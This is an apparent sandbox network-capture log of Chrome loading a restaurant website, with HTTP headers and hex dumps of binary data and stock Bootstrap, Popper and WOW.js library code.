                                                                                                                                                    2024-10-01 04:26:29 UTC6016INData Raw: 9e db 03 98 ef 72 59 fd 7b aa f5 40 59 d4 ae 19 5b 1a e3 5b ac 60 73 ab 73 62 dd d8 e7 fc 13 df e8 ed f6 2d 6b be a9 3a ac 7f 55 d9 b5 bd c4 6e 35 b1 8e e0 47 e7 bd cd 59 79 78 58 35 d8 c6 e3 be cb 5a f9 dc f7 80 d2 34 dd f4 2b dd ff 00 54 91 b1 77 f9 b5 e5 3c 52 37 1d 4e d7 c2 cb 26 b6 dd 93 46 5b 5e f6 db 70 69 bb d4 70 f7 bd ae d8 dd 9b c3 bf c1 7e 8f 6e ff 00 cc 57 7a 65 82 fc 76 60 d8 d8 bb 18 06 b4 17 ee 0e 68 1b 4b 1b b4 fa 6c b6 b7 31 f6 35 9f e1 2a ff 00 8b 55 30 c3 ae e9 d9 74 3a b0 f7 12 d6 b4 16 97 b9 ae 77 e9 6a ba af cf ab f4 95 fa 7e df f8 a5 9d 8d f6 a6 17 e4 e2 b6 c6 5c 64 b6 c6 b4 b9 85 c7 71 f5 74 66 c6 5a cd de c7 ee 55 e3 ad 82 75 89 af fb d5 f3 17 11 43 43 a8 f3 3f 30 a7 a0 ca e9 ed d8 36 82 1c d1 2c 73 44 18 07 e8 ff 00 df 95 70 f3
                                                                                                                                                    Data Ascii: rY{@Y[[`ssb-k:Un5GYyxX5Z4+Tw<R7N&F[^pip~nWzev`hKl15*U0t:wj~\dqtfZUuCC?06,sDp
                                                                                                                                                    2024-10-01 04:26:29 UTC2176INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: a2 f7 0b 5a 26 49 c8 72 af 65 2f 12 2c ed 65 0b 54 a6 e7 8e 67 5f c2 07 28 f5 26 97 34 9a 0f b3 da 0c a8 e3 2a eb 4e fb d0 09 be b8 43 b8 bc 8a ae a6 73 6b 44 b8 03 96 d2 ab dd 68 db b9 fb 31 7e 32 82 d4 97 20 e9 38 a8 ac b5 95 b7 96 fa 65 89 6d 02 6f 40 de e2 b6 80 06 c2 bc 98 26 53 a5 6f 9d 5c 17 66 9b 9f 6a ac a7 cb 6c de cd 76 28 2e ff 00 16 d8 40 cf 50 d5 a2 71 9a 74 2e 63 36 d0 1c df d0 b0 cc 3c ee 48 1b 34 19 6f a0 69 ab 58 23 5c 69 ba 58 a6 96 f5 72 5d 50 af 08 3b 39 ce 5f d2 4e 71 f7 1c c4 03 8b 90 43 24 a2 f5 3a eb 50 93 82 17 31 4d 00 ca e5 d8 24 9b 66 25 78 06 93 a6 3d a6 81 23 eb f3 65 e8 cc a2 38 3d 56 4d a2 2b 20 e1 ad 0d 2b 0c 5a 57 eb d4 29 d1 8e b5 90 51 5a ac a7 5c 61 77 59 2d 2c 2b 27 e7 17 de af d2 66 d5 4b 09 36 5c 85 5d eb e5 79 67
                                                                                                                                                    Data Ascii: Z&Ire/,eTg_(&4*NCskDh1~2 8emo@&So\fjlv(.@Pqt.c6<H4oiX#\iXr]P;9_NqC$:P1M$f%x=#e8=VM+ +ZW)QZ\awY-,+'fK6\]yg
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: 96 2d 74 18 60 6b 35 98 88 47 cd 96 5e e7 c5 57 bd e3 25 d5 72 09 a0 3e c2 f4 e4 b4 98 c7 ad 05 65 e0 02 cd 5b 44 5f 57 5f 6e e9 da a2 fa 0f b2 00 bd 5f a3 7b 03 75 d7 6a 43 48 6d 08 7e 35 b5 f6 c8 e8 42 52 b1 cf 63 e9 64 ef 25 1a ed 81 7f 63 b9 39 47 55 d7 f0 2e ae c6 ea 2c 3f 76 a5 ae b1 52 05 d2 52 4c 83 52 ca bf 83 b5 04 2d 96 6f 6a 2b 59 a1 6a ab f6 5e d1 b8 b9 a8 38 f7 7d f7 79 67 f2 11 9e 55 2f 23 35 c9 0b 16 51 eb d5 6c db 5a c0 70 60 32 67 20 f2 60 ed ed 3d 9b ad 9c d6 7b 48 4d 4b de d9 eb 45 4b 4d ee 0b a4 fd 9f b0 32 bd 0a 16 ff 00 26 a0 7c 86 07 b2 d9 5e ab 08 75 94 4b 3d 81 00 cb d7 a8 a0 b5 fb 7d 45 ed 25 ff 00 f8 e5 ba d1 59 6c b4 63 11 b0 5b 07 5f ec 25 53 6d b0 db 2e ea 6f ee 10 56 ee eb d4 5a a4 a5 8c ce bd 58 a8 f8 35 9d 9f 53 b9 32 be
                                                                                                                                                    Data Ascii: -t`k5G^W%r>e[D_W_n_{ujCHm~5BRcd%c9GU.,?vRRLR-oj+Yj^8}ygU/#5QlZp`2g `={HMKEKM2&|^uK=}E%Ylc[_%Sm.oVZX5S2
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: 97 dd 0a e2 fe 29 6b f3 3d dd 0b 81 08 8a f7 02 51 13 10 75 6e a2 25 65 33 31 da 32 0f 65 21 0a aa 2d 96 5d bd cf b9 57 73 13 0f 8a 59 13 ff 00 25 0c 83 9b 98 79 5b d3 5f 46 52 90 28 44 73 a7 d5 0f 59 b5 ff 00 25 0b c6 02 b5 7a 58 c8 6d 4b ac b1 dc e2 76 c5 45 fd 22 3a 58 50 9c 44 ac bd e9 d1 17 c3 c5 7b c2 54 1f fb 28 23 4c be 9b c0 8a 6a 84 29 d9 13 4b 1d 37 2d 94 3d de 11 b4 90 17 aa 18 28 77 99 63 f2 12 2f af 47 b9 cb 49 21 08 38 a3 ba 9e 95 76 d9 73 1e 88 af a4 14 5d 91 ff 00 94 95 f1 6c de 65 4a 3b d0 a2 22 28 eb c5 3f 3e 40 22 09 68 33 71 8f 68 46 bf d3 e8 59 14 ad ed 5d c8 e5 d5 e8 64 1e 8a 2f b5 4e d2 ed 3a 9b 38 68 9a 60 37 38 c5 41 15 75 47 96 74 22 2c 28 e6 32 70 b6 db 13 55 b2 ec 50 e5 a6 85 05 ca dd e0 69 c2 8e 12 d8 0c 55 11 14 0e 8c 61 23
                                                                                                                                                    Data Ascii: )k=Qun%e312e!-]WsY%y[_FR(DsY%zXmKvE":XPD{T(#Lj)K7-=(wc/GI!8vs]leJ;"(?>@"h3qhFY]d/N:8h`78AuGt",(2pUPiUa#


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    15192.168.2.449761162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:29 UTC593OUTGET /assets/vendors/bootstrap/bootstrap.bundle.js HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:29 UTC280INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    content-type: text/javascript
                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 222911
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:29 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 33 2e 31 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 39 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62 61
                                                                                                                                                    Data Ascii: /*! * Bootstrap v4.3.1 (https://getbootstrap.com/) * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */(function (globa
                                                                                                                                                    2024-10-01 04:26:29 UTC8192INData Raw: 45 59 24 32 20 3d 20 27 2e 64 61 74 61 2d 61 70 69 27 3b 0a 20 20 76 61 72 20 4a 51 55 45 52 59 5f 4e 4f 5f 43 4f 4e 46 4c 49 43 54 24 32 20 3d 20 24 2e 66 6e 5b 4e 41 4d 45 24 32 5d 3b 0a 20 20 76 61 72 20 41 52 52 4f 57 5f 4c 45 46 54 5f 4b 45 59 43 4f 44 45 20 3d 20 33 37 3b 20 2f 2f 20 4b 65 79 62 6f 61 72 64 45 76 65 6e 74 2e 77 68 69 63 68 20 76 61 6c 75 65 20 66 6f 72 20 6c 65 66 74 20 61 72 72 6f 77 20 6b 65 79 0a 0a 20 20 76 61 72 20 41 52 52 4f 57 5f 52 49 47 48 54 5f 4b 45 59 43 4f 44 45 20 3d 20 33 39 3b 20 2f 2f 20 4b 65 79 62 6f 61 72 64 45 76 65 6e 74 2e 77 68 69 63 68 20 76 61 6c 75 65 20 66 6f 72 20 72 69 67 68 74 20 61 72 72 6f 77 20 6b 65 79 0a 0a 20 20 76 61 72 20 54 4f 55 43 48 45 56 45 4e 54 5f 43 4f 4d 50 41 54 5f 57 41 49 54 20 3d
                                                                                                                                                    Data Ascii: EY$2 = '.data-api'; var JQUERY_NO_CONFLICT$2 = $.fn[NAME$2]; var ARROW_LEFT_KEYCODE = 37; // KeyboardEvent.which value for left arrow key var ARROW_RIGHT_KEYCODE = 39; // KeyboardEvent.which value for right arrow key var TOUCHEVENT_COMPAT_WAIT =
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: 20 66 69 72 65 29 20 77 65 20 65 78 70 6c 69 63 69 74 6c 79 20 72 65 73 74 61 72 74 20 63 79 63 6c 69 6e 67 0a 20 20 20 20 20 20 20 20 20 20 5f 74 68 69 73 33 2e 70 61 75 73 65 28 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 5f 74 68 69 73 33 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 5f 74 68 69 73 33 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 5f 74 68 69 73 33 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 20 3d 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 20 28 65 76 65 6e 74 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 74 68 69 73 33 2e 63 79 63 6c 65 28
                                                                                                                                                    Data Ascii: fire) we explicitly restart cycling _this3.pause(); if (_this3.touchTimeout) { clearTimeout(_this3.touchTimeout); } _this3.touchTimeout = setTimeout(function (event) { return _this3.cycle(
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 20 44 41 54 41 5f 4b 45 59 24 33 29 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 63 6f 6e 66 69 67 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 70 61 72 65 6e 74 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 74 72 69 67 67 65 72 41 72 72 61 79 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 7d 20 2f 2f 20 50 72 69 76 61 74 65 0a 20 20 20 20 3b 0a 0a 20 20 20 20 5f 70 72 6f 74 6f 2e 5f 67 65 74 43 6f 6e 66 69 67 20 3d 20 66 75 6e 63 74 69 6f 6e 20 5f 67 65 74 43 6f 6e 66
                                                                                                                                                    Data Ascii: removeData(this._element, DATA_KEY$3); this._config = null; this._parent = null; this._element = null; this._triggerArray = null; this._isTransitioning = null; } // Private ; _proto._getConfig = function _getConf
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: 74 79 70 65 2c 20 70 72 6f 74 6f 50 72 6f 70 73 29 3b 0a 20 20 20 20 20 20 69 66 20 28 73 74 61 74 69 63 50 72 6f 70 73 29 20 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 43 6f 6e 73 74 72 75 63 74 6f 72 2c 20 73 74 61 74 69 63 50 72 6f 70 73 29 3b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 43 6f 6e 73 74 72 75 63 74 6f 72 3b 0a 20 20 20 20 7d 3b 0a 20 20 7d 28 29 3b 0a 0a 0a 0a 0a 0a 20 20 76 61 72 20 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 6f 62 6a 2c 20 6b 65 79 2c 20 76 61 6c 75 65 29 20 7b 0a 20 20 20 20 69 66 20 28 6b 65 79 20 69 6e 20 6f 62 6a 29 20 7b 0a 20 20 20 20 20 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 62 6a 2c 20 6b 65 79 2c 20 7b 0a 20 20 20 20 20 20 20 20 76 61
                                                                                                                                                    Data Ascii: type, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }(); var defineProperty = function (obj, key, value) { if (key in obj) { Object.defineProperty(obj, key, { va
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: 20 20 20 2a 20 40 6d 65 74 68 6f 64 0a 20 20 20 2a 20 40 6d 65 6d 62 65 72 6f 66 20 50 6f 70 70 65 72 2e 55 74 69 6c 73 0a 20 20 20 2a 20 40 70 61 72 61 6d 20 7b 64 61 74 61 4f 62 6a 65 63 74 7d 20 64 61 74 61 0a 20 20 20 2a 20 40 70 61 72 61 6d 20 7b 41 72 72 61 79 7d 20 6d 6f 64 69 66 69 65 72 73 0a 20 20 20 2a 20 40 70 61 72 61 6d 20 7b 53 74 72 69 6e 67 7d 20 65 6e 64 73 20 2d 20 4f 70 74 69 6f 6e 61 6c 20 6d 6f 64 69 66 69 65 72 20 6e 61 6d 65 20 75 73 65 64 20 61 73 20 73 74 6f 70 70 65 72 0a 20 20 20 2a 20 40 72 65 74 75 72 6e 73 20 7b 64 61 74 61 4f 62 6a 65 63 74 7d 0a 20 20 20 2a 2f 0a 20 20 66 75 6e 63 74 69 6f 6e 20 72 75 6e 4d 6f 64 69 66 69 65 72 73 28 6d 6f 64 69 66 69 65 72 73 2c 20 64 61 74 61 2c 20 65 6e 64 73 29 20 7b 0a 20 20 20 20 76
                                                                                                                                                    Data Ascii: * @method * @memberof Popper.Utils * @param {dataObject} data * @param {Array} modifiers * @param {String} ends - Optional modifier name used as stopper * @returns {dataObject} */ function runModifiers(modifiers, data, ends) { v
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: 73 65 74 50 61 72 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 20 2b 20 6f 66 66 73 65 74 73 2e 72 69 67 68 74 3b 0a 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 20 3d 20 2d 6f 66 66 73 65 74 50 61 72 65 6e 74 52 65 63 74 2e 77 69 64 74 68 20 2b 20 6f 66 66 73 65 74 73 2e 72 69 67 68 74 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 6c 65 66 74 20 3d 20 6f 66 66 73 65 74 73 2e 6c 65 66 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 69 66 20 28 67 70 75 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 26 26 20 70 72 65 66 69 78 65 64 50 72 6f 70 65 72 74 79 29 20 7b 0a 20 20 20 20 20 20 73 74 79 6c 65 73 5b 70 72 65 66 69 78 65 64 50 72 6f 70 65 72 74 79 5d 20 3d 20 27 74 72 61 6e 73 6c 61 74 65 33
                                                                                                                                                    Data Ascii: setParent.clientWidth + offsets.right; } else { left = -offsetParentRect.width + offsets.right; } } else { left = offsets.left; } if (gpuAcceleration && prefixedProperty) { styles[prefixedProperty] = 'translate3
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: 20 6f 72 69 65 6e 74 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 70 6f 70 70 65 72 0a 20 20 20 20 20 20 76 61 72 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 3d 20 28 69 6e 64 65 78 20 3d 3d 3d 20 31 20 3f 20 21 75 73 65 48 65 69 67 68 74 20 3a 20 75 73 65 48 65 69 67 68 74 29 20 3f 20 27 68 65 69 67 68 74 27 20 3a 20 27 77 69 64 74 68 27 3b 0a 20 20 20 20 20 20 76 61 72 20 6d 65 72 67 65 57 69 74 68 50 72 65 76 69 6f 75 73 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 70 0a 20 20 20 20 20 20 2f 2f 20 54 68 69 73 20 61 67 67 72 65 67 61 74 65 73 20 61 6e 79 20 60 2b 60 20 6f 72 20 60 2d 60 20 73 69 67 6e 20 74 68 61 74 20 61 72 65 6e 27 74 20 63 6f 6e 73 69 64 65 72 65 64 20 6f 70 65 72 61 74 6f 72 73 0a 20 20 20 20 20 20 2f 2f 20 65 2e 67
                                                                                                                                                    Data Ascii: orientation of the popper var measurement = (index === 1 ? !useHeight : useHeight) ? 'height' : 'width'; var mergeWithPrevious = false; return op // This aggregates any `+` or `-` sign that aren't considered operators // e.g
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: 20 60 62 6f 75 6e 64 61 72 69 65 73 45 6c 65 6d 65 6e 74 60 0a 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 35 2c 0a 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 2a 20 40 70 72 6f 70 20 7b 53 74 72 69 6e 67 7c 48 54 4d 4c 45 6c 65 6d 65 6e 74 7d 20 62 6f 75 6e 64 61 72 69 65 73 45 6c 65 6d 65 6e 74 3d 27 76 69 65 77 70 6f 72 74 27 0a 20 20 20 20 20 20 20 2a 20 54 68 65 20 65 6c 65 6d 65 6e 74 20 77 68 69 63 68 20 77 69 6c 6c 20 64 65 66 69 6e 65 20 74 68 65 20 62 6f 75 6e 64 61 72 69 65 73 20 6f 66 20 74 68 65 20 70 6f 70 70 65 72 20 70 6f 73 69 74 69 6f 6e 2e 0a 20 20 20 20 20 20 20 2a 20 54 68 65 20 70 6f 70 70 65 72 20 77 69 6c 6c 20 6e 65 76 65 72 20 62 65 20 70 6c 61 63 65 64 20 6f 75 74 73 69 64 65 20 6f 66 20 74
                                                                                                                                                    Data Ascii: `boundariesElement` */ padding: 5, /** * @prop {String|HTMLElement} boundariesElement='viewport' * The element which will define the boundaries of the popper position. * The popper will never be placed outside of t
                                                                                                                                                    2024-10-01 04:26:29 UTC16384INData Raw: 74 2c 20 63 6f 6e 66 69 67 29 20 7b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 20 3d 20 65 6c 65 6d 65 6e 74 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 70 6f 70 70 65 72 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 63 6f 6e 66 69 67 20 3d 20 74 68 69 73 2e 5f 67 65 74 43 6f 6e 66 69 67 28 63 6f 6e 66 69 67 29 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 6d 65 6e 75 20 3d 20 74 68 69 73 2e 5f 67 65 74 4d 65 6e 75 45 6c 65 6d 65 6e 74 28 29 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 69 6e 4e 61 76 62 61 72 20 3d 20 74 68 69 73 2e 5f 64 65 74 65 63 74 4e 61 76 62 61 72 28 29 3b 0a 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 3b 0a 20 20 20 20 7d 20 2f 2f 20 47 65 74 74 65 72 73
                                                                                                                                                    Data Ascii: t, config) { this._element = element; this._popper = null; this._config = this._getConfig(config); this._menu = this._getMenuElement(); this._inNavbar = this._detectNavbar(); this._addEventListeners(); } // Getters


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    16192.168.2.449759162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:29 UTC592OUTGET /assets/vendors/bootstrap/bootstrap.affix.js HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:29 UTC278INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    content-type: text/javascript
                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 4838
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:29 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:29 UTC4838INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 3a 20 61 66 66 69 78 2e 6a 73 20 76 33 2e 33 2e 36 0a 20 2a 20 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 6a 61 76 61 73 63 72 69 70 74 2f 23 61 66 66 69 78 0a 20 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 35 20 54 77 69 74 74
                                                                                                                                                    Data Ascii: /* ======================================================================== * Bootstrap: affix.js v3.3.6 * http://getbootstrap.com/javascript/#affix * ======================================================================== * Copyright 2011-2015 Twitt


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    17192.168.2.449760162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:29 UTC574OUTGET /assets/vendors/wow/wow.js HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:29 UTC278INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    content-type: text/javascript
                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 8415
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:29 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:29 UTC8415INData Raw: 2f 2a 21 20 57 4f 57 20 2d 20 76 31 2e 31 2e 33 20 2d 20 32 30 31 36 2d 30 35 2d 30 36 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 36 20 4d 61 74 74 68 69 65 75 20 41 75 73 73 61 67 75 65 6c 3b 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 6c 79 28 62 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 67 3d 5b 5d 2e 69 6e 64 65 78 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 30 2c 63 3d 74 68 69 73 2e 6c 65 6e 67 74 68 3b 63 3e 62 3b 62 2b 2b 29 69 66 28 62 20 69 6e 20 74 68 69 73 26 26 74 68 69 73 5b 62 5d 3d 3d 3d 61 29 72 65 74 75 72 6e 20
